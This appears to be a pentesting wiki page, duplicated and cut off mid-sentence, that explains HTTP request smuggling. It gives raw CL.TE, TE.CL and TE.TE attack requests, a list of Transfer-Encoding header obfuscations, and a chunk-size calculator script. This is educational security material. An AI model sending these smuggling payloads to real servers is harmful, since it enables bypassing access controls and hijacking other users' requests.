HTTP Request Smuggling

Introduction

HTTP request smuggling is a type of web vulnerability that occurs when an attacker is able to send multiple HTTP requests to a server in a way that causes the server to process them in an unintended manner. This can lead to a number of security problems, including:

Denial of Service (DoS) attacks: An attacker could use HTTP request smuggling to send a large number of requests to a server, overwhelming it and causing it to become unavailable to legitimate users.
Data leakage: An attacker could use HTTP request smuggling to manipulate the way that a server processes requests, potentially allowing them to access sensitive information that would otherwise be protected.
Cross-Site Scripting (XSS) attacks: An attacker could use HTTP request smuggling to inject malicious code into a server's response, potentially allowing them to execute code on the client's machine.

Most of today's web applications are composed of a front-end server (which might be a load balancer or reverse proxy) that forwards the request to a back-end server (which actually performs the request).

The requests to the back-end server are typically sent over the same connection due to its better performance. This means that every HTTP request is sent one after another, so the front-end and back-end must agree on the boundaries between requests.

There are two different ways to specify where a request ends: the Content-Length header and the Transfer-Encoding header.

The Content-Length header specifies the number of bytes that compose the message body:

POST /admin HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

user=test&password=1234

The Transfer-Encoding header species that the message body is going to be sent in a series of chunks rather than a single message. Each chunk is composed of the chunk size in bytes (expressed in hexadecimal), a new line, the content of the chunk, and a new line terminating in zero.

POST /admin HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

17
user=test&password=1234
0

HTTP smuggling attacks

CL.TE.

The front-end (FE) uses the Content-Length header, and the back-end server uses the Transfer-Encoding header.

POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Foo: x

TE.CL.

The front-end server uses the Transfer-Encoding header, and the back-end server uses the Content-Length header.

POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 4

60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <title>Chunk Calculator</title>
    <style>body {font-family: sans-serif;}</style>
</head>

<body>
    <h1>Chunk Calculator</h1>
    <h2>By: <a href='https://twitter.com/takito1812'>Takito</a></h2>
    <textarea rows="10" cols="50" name="chunk" onkeyup="calc()" autofocus>
</textarea>
    <p>The chunk size is <strong id="size"></strong></p>
    <pre id="explanation"></pre>
    <script>
        function calc() {
            var chunk = document.getElementsByName("chunk")[0].value;
            var lines = chunk.split("\n");
            var linesLength = lines.length;
            var chars = 0;
            var explanation = document.getElementById("explanation");
            explanation.innerHTML = "";
            for (var i = 0; i < linesLength; i++) {
                var line = lines[i];
                var lineLength = line.length;
                chars += lineLength;
                if (i < linesLength - 1) {
                    chars += 2;
                    explanation.innerHTML += line + " -> " + lineLength + " + 2 (\\r\\n) = " + (lineLength + 2) + " chars<br>";
                } else {
                    explanation.innerHTML += line + " -> " + lineLength + " chars<br>";
                }
            }
            document.getElementById("size").innerHTML = chars.toString(16) + " hex (" + chars + " chars)";
        }
    </script>
</body>

</html>

TE.TE.

The front-end and back-end servers both support the Transfer-Encoding header. To avoid one of the servers processing the header, it is required to obfuscate the header in some way.

Here there is a list of obfuscation examples:

Transfer-Encoding: xchunked

Transfer-Encoding : chunked

Transfer-Encoding: chunked
Transfer-Encoding: x

Transfer-Encoding:<tab>chunked

 Transfer-Encoding: chunked

X: X%0aTransfer-Encoding: chunked

Transfer-Encoding
: chunked

POST / HTTP/1.1
Host: example
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Tools

References

Last updated 2 years ago

HTTP Request Smuggling

Introduction

Denial of Service (DoS) attacks: An attacker could use HTTP request smuggling to send a large number of requests to a server, overwhelming it and causing it to become unavailable to legitimate users.
Data leakage: An attacker could use HTTP request smuggling to manipulate the way that a server processes requests, potentially allowing them to access sensitive information that would otherwise be protected.
Cross-Site Scripting (XSS) attacks: An attacker could use HTTP request smuggling to inject malicious code into a server's response, potentially allowing them to execute code on the client's machine.

There are two different ways to specify where a request ends: the Content-Length header and the Transfer-Encoding header.

The Content-Length header specifies the number of bytes that compose the message body:

POST /admin HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

user=test&password=1234

POST /admin HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

17
user=test&password=1234
0

HTTP smuggling attacks

The following attacks are only valid for HTTP/1.1, if your target website used HTTP/2, then read about how to exploit it in this .

CL.TE.

The front-end (FE) uses the Content-Length header, and the back-end server uses the Transfer-Encoding header.

POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Foo: x

TE.CL.

The front-end server uses the Transfer-Encoding header, and the back-end server uses the Content-Length header.

POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 4

60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Because counting the characters on a chunk and then passing the number to hex is a pity, you can use the following chunk calculator by .

<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <title>Chunk Calculator</title>
    <style>body {font-family: sans-serif;}</style>
</head>

<body>
    <h1>Chunk Calculator</h1>
    <h2>By: <a href='https://twitter.com/takito1812'>Takito</a></h2>
    <textarea rows="10" cols="50" name="chunk" onkeyup="calc()" autofocus>
</textarea>
    <p>The chunk size is <strong id="size"></strong></p>
    <pre id="explanation"></pre>
    <script>
        function calc() {
            var chunk = document.getElementsByName("chunk")[0].value;
            var lines = chunk.split("\n");
            var linesLength = lines.length;
            var chars = 0;
            var explanation = document.getElementById("explanation");
            explanation.innerHTML = "";
            for (var i = 0; i < linesLength; i++) {
                var line = lines[i];
                var lineLength = line.length;
                chars += lineLength;
                if (i < linesLength - 1) {
                    chars += 2;
                    explanation.innerHTML += line + " -> " + lineLength + " + 2 (\\r\\n) = " + (lineLength + 2) + " chars<br>";
                } else {
                    explanation.innerHTML += line + " -> " + lineLength + " chars<br>";
                }
            }
            document.getElementById("size").innerHTML = chars.toString(16) + " hex (" + chars + " chars)";
        }
    </script>
</body>

</html>

TE.TE.

The front-end and back-end servers both support the Transfer-Encoding header. To avoid one of the servers processing the header, it is required to obfuscate the header in some way.

Here there is a list of obfuscation examples:

Transfer-Encoding: xchunked

Transfer-Encoding : chunked

Transfer-Encoding: chunked
Transfer-Encoding: x

Transfer-Encoding:<tab>chunked

 Transfer-Encoding: chunked

X: X%0aTransfer-Encoding: chunked

Transfer-Encoding
: chunked

This example comes from the issue "Multiple Transfer-Encoding headers misinterprets request payload" from .

POST / HTTP/1.1
Host: example
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Tools

Because it is quite hard to test every type of HTTP smuggling on every website you need to audit, you can use the Burp Suite Extension . Right-click on the request, then Extensions/HTTP Request Smuggler, and select the type of scan you want to la

References

Last updated 2 years ago